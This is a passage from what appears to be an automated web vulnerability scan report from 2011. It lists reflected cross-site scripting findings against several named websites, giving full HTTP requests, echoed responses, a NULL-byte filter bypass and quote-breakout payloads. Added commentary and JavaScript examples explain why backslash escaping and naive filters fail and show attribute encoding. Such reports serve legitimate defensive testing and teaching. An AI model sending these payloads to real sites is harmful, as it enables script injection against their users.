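// which leaves the browser to decide whether the body is HTML.
function responseFor(query, log = []) {
  const { ok, html } = renderAdSlot(query, log);
  return {
    status: ok ? 200 : 400,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      'Cache-Control': 'no-store',
    },
    body: html,
  };
}
```

The validation is deliberately a whitelist on the whole string rather than a check that parsing succeeds: a parser's error text is an implementation detail, and the 6.9/6.10 responses show what happens when that detail is treated as presentable output.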

6.11. http://blogs.naukri.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.naukri.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee7d0"><script>alert(1)</script>9455170581c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee7d0\"><script>alert(1)</script>9455170581c in the application's response.

The backslash in front of the quote is the only change made to the input. That is the behaviour of PHP's addslashes() or magic_quotes_gpc (the server reports PHP/5.2.6, where magic_quotes_gpc was still on by default), an escaping scheme intended for SQL-style string literals. It means nothing to an HTML parser: the quote still closes the href value, and the <script> element that follows is parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee7d0"><script>alert(1)</script>9455170581c=1 HTTP/1.1
Host: blogs.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:12:46 GMT
Server: NWS/1.0. (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
X-Pingback: http://blogs.naukri.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://blogs.naukri.com/?ee7d0\"><script>alert(1)</script>9455170581c=1">
...[SNIP]...

6.12. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00652ee<a>ed07bd10b85 was submitted in the REST URL parameter 1. This input was echoed as 652ee<a>ed07bd10b85 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00652ee<a>ed07bd10b85/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:17:29 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>ed07bd10b85/">weblog%00652ee<a>ed07bd10b85</a>
...[SNIP]...

6.13. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00839df"><script>alert(1)</script>d42176e2143 was submitted in the REST URL parameter 1. This input was echoed as 839df"><script>alert(1)</script>d42176e2143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00839df"><script>alert(1)</script>d42176e2143/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:17:28 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00839df"><script>alert(1)</script>d42176e2143/2006/">
...[SNIP]...
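
Findings 6.12 and 6.13 are the same defect reached through a NULL-byte bypass: as the scanner's remediation note explains, a filter in front of the application stops reading at the decoded %00 while the application reflects the raw path segment, %00 included, into its 404 page. The following is an added example, not code from dean.edwards.name or from any WAF product, that simulates the two behaviours side by side: a C-string style inspector that sees only the bytes before the first NUL, the application that echoes the whole segment, and a hardened inspector that decodes first, refuses NUL outright and matches against the complete buffer. The blocklist pattern and the helper names are assumptions for the demonstration; the path segment is the one from the 6.13 request.

```javascript
// Added example for 6.12 / 6.13: why "%00" defeated the filter. Not code from
// dean.edwards.name or from any particular WAF.

// Assumed blocklist a naive filter might apply to a path segment.
const SUSPICIOUS = /<[a-z!\/]|javascript:|on\w+=/i;

// Percent-decode a URL path segment. A Latin-1 view of the bytes is enough
// for this demonstration; real code should work on the raw bytes.
function percentDecode(segment) {
  return segment.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Naive inspector: models a native-code filter that copies the decoded value
// into a NUL-terminated buffer, so everything after the first "\0" is
// invisible to the pattern match.
function naiveFilterAllows(segment) {
  const cString = percentDecode(segment).split('\0')[0];
  return !SUSPICIOUS.test(cString);
}

// What the application behind the filter actually does (6.12 / 6.13): it
// reflects the raw segment into the 404 page, percent-encoded NUL and all.
function appReflects(segment) {
  return '<a href="/' + segment + '/2006/">' + segment + '</a>';
}

// Hardened inspector: decode first, refuse NUL bytes (they have no legitimate
// use in a URL path), and run the pattern over the complete decoded string.
function hardenedFilterAllows(segment) {
  const decoded = percentDecode(segment);
  if (decoded.includes('\0')) return false;
  return !SUSPICIOUS.test(decoded);
}
```

The simulation only shows why the bypass works; the fix the scanner recommends still stands, which is to encode the path segment where the application echoes it, so that the filter's behaviour stops mattering.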

6.14. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a10c<a>13a79934494 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again2a10c<a>13a79934494/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:19:49 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 14 May 2011 14:19:49 GMT
Last-Modified: Sat, 14 May 2011 14:19:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again2a10c<a>13a79934494/</h1>
...[SNIP]...

6.15. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d2"><script>alert(1)</script>a7c80307e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36d2\"><script>alert(1)</script>a7c80307e08 in the application's response.

The attribute here is the action of the comment form, which is built from the request URI. As in 6.11, the only transformation applied is a backslash before the quote (addslashes() or magic_quotes_gpc; the server reports PHP/5.2.5), which does not stop the quote from closing the attribute in HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?a36d2"><script>alert(1)</script>a7c80307e08=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:14:51 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 14 May 2011 14:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 215571

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?a36d2\"><script>alert(1)</script>a7c80307e08=1#preview" method="post">
...[SNIP]...
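
In 6.11 and 6.15 the reflected value comes back with a backslash inserted before the quote, which is what PHP's addslashes() or magic_quotes_gpc produces. That escaping is meant for SQL-style string literals and means nothing to an HTML parser, so the attribute still closes. The following is an added example, not code from blogs.naukri.com or dean.edwards.name, contrasting the two treatments of the request URI before it is placed in an href or action attribute: a simulated addslashes-style escape, and attribute-context entity encoding. The helper names and the small tag counter are assumptions for the demonstration; the URI is the one from the 6.11 request.

```javascript
// Added example for 6.11 / 6.15: backslash escaping vs HTML attribute encoding.
// Not code from blogs.naukri.com or dean.edwards.name.

// Simulates PHP addslashes() / magic_quotes_gpc: backslash before ' " \ and NUL.
function addslashes(s) {
  return s.replace(/[\\'"\0]/g, (c) => (c === '\0' ? '\\0' : '\\' + c));
}

// Entity-encode for a double-quoted HTML attribute value.
function encodeForAttribute(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// The self-referencing link both responses contained, built the wrong way
// and the right way.
function selfLinkWithAddslashes(requestUri) {
  return '<a href="' + addslashes(requestUri) + '">';
}
function selfLinkEncoded(requestUri) {
  return '<a href="' + encodeForAttribute(requestUri) + '">';
}

// Minimal attribute-aware scan of the emitted markup: counts the tags a
// parser would see, honouring double-quoted attribute values. One tag means
// the attribute never closed; more means the input broke out of it.
// (A real HTML parser is stricter; this is just enough to show the point.)
function countTags(html) {
  let count = 0, inTag = false, inQuotes = false;
  for (const c of html) {
    if (!inTag) {
      if (c === '<') { inTag = true; count += 1; }
    } else if (c === '"') {
      inQuotes = !inQuotes;
    } else if (c === '>' && !inQuotes) {
      inTag = false;
    }
  }
  return count;
}
```

The counter reports three tags for the addslashes version (the anchor, the injected script, and its closing tag) and one for the encoded version; the backslash survives into the attribute value as a literal character and changes nothing about where the quote ends.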

6.16. http://hosted.newsgator.com//NGBuzz/gateway.ashx/ngdsr [_dsrId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.newsgator.com
Path:   //NGBuzz/gateway.ashx/ngdsr

Issue detail

The value of the _dsrId request parameter is copied into the response. The payload ad01c<script>alert(1)</script>aa81f47cd4d was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

The scanner classified the context as plain text between tags, but the response is served as text/javascript and the value lands inside a single-quoted JavaScript string literal passed to window.ng_scriptload(...). A <script> tag inside a string literal in a script resource is inert, so the payload shown does not execute as-is. The reflection is real and unencoded; what decides exploitability is how the same parameter handles a single quote and a backslash, which was not exercised here. The Certain confidence therefore applies to the reflection rather than to a working proof of concept, and this one needs manual follow-up.

Request

GET //NGBuzz/gateway.ashx/ngdsr?C_=NGBuzz.Classes.ToolbarAPI%2CNGBuzz&M_=GetUserId&orgCode=RTRIN&_dsrId=_ngdsr_0ad01c<script>alert(1)</script>aa81f47cd4d HTTP/1.1
Host: hosted.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:06:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Compressed-By: HttpCompress
Set-Cookie: NGToolbarTemp=1; expires=Sun, 15-May-2011 18:06:35 GMT; path=/
Cache-Control: private, max-age=30
Expires: Sat, 14 May 2011 18:07:05 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 150

window.ng_scriptload({"id":'_ngdsr_0ad01c<script>alert(1)</script>aa81f47cd4d',
"status":200,
"statusText":"OK",
"response":{"error":"","result":0}});

6.17. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8471"><script>alert(1)</script>8efa1b7e398 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

The attribute shown is the href of an <a> inside a <noscript> element. In browsers that implement the HTML5 parsing algorithm, <noscript> content is parsed as raw text while scripting is enabled, so the injected <script> does not run from this position, and with scripting disabled nothing runs anyway. The same unencoded value is also written into script context in this page (6.18 and 6.19), which is where this parameter is actually exploitable.

Taken together with those findings, the reflection demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5Dc8471"><script>alert(1)</script>8efa1b7e398&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4803
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]c8471"><script>alert(1)</script>8efa1b7e398" target="_blank">
...[SNIP]...

6.18. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 554f8"-alert(1)-"ed0fb0a8d66 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d66&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4728
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]554f8"-alert(1)-"ed0fb0a8d66" t
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
   mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d66");
   mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
   mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d
...[SNIP]...

6.19. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a63'%3balert(1)//5d8d633e097 was submitted in the mpck parameter. This input was echoed as 13a63';alert(1)//5d8d633e097 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D13a63'%3balert(1)//5d8d633e097&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4734
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]13a63';alert(1)//5d8d633e097" t
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]13a63';alert(1)//5d8d633e097" target="_blank">
...[SNIP]...

6.20. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd893'%3balert(1)//85277f53b6c was submitted in the mpvc parameter. This input was echoed as bd893';alert(1)//85277f53b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=bd893'%3balert(1)//85277f53b6c HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4758
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="bd893';alert(1)//85277f53b6chttp://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" t
...[SNIP]...
<a href="bd893';alert(1)//85277f53b6chttp://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" target="_blank">
...[SNIP]...

6.21. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee9b6"%3balert(1)//e1c37021c77 was submitted in the mpvc parameter. This input was echoed as ee9b6";alert(1)//e1c37021c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=ee9b6"%3balert(1)//e1c37021c77 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4758
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="ee9b6";alert(1)//e1c37021c77http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" t
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
   mpvclick = encodeURIComponent("ee9b6";alert(1)//e1c37021c77");
   mpvc = mpvclick;
}
else if (mpvce == 2) {
   mpvclick2 = encodeURIComponent("ee9b6";alert(1)//e1c37021c77");
   mpvc = encodeURIComponent(mpvclick2);
}
else {
   mpvc = ("ee9b6"%3balert(1)//e1c3
...[SNIP]...

6.22. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215cc"><script>alert(1)</script>a6809bca270 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=215cc"><script>alert(1)</script>a6809bca270 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4846
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="215cc"><script>alert(1)</script>a6809bca270http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" target="_blank">
...[SNIP]...

6.23. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6033%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d8060b71fa2 was submitted in the xz parameter. This input was echoed as b6033"style="x:expression(alert(1))"d8060b71fa2 in the application's response.

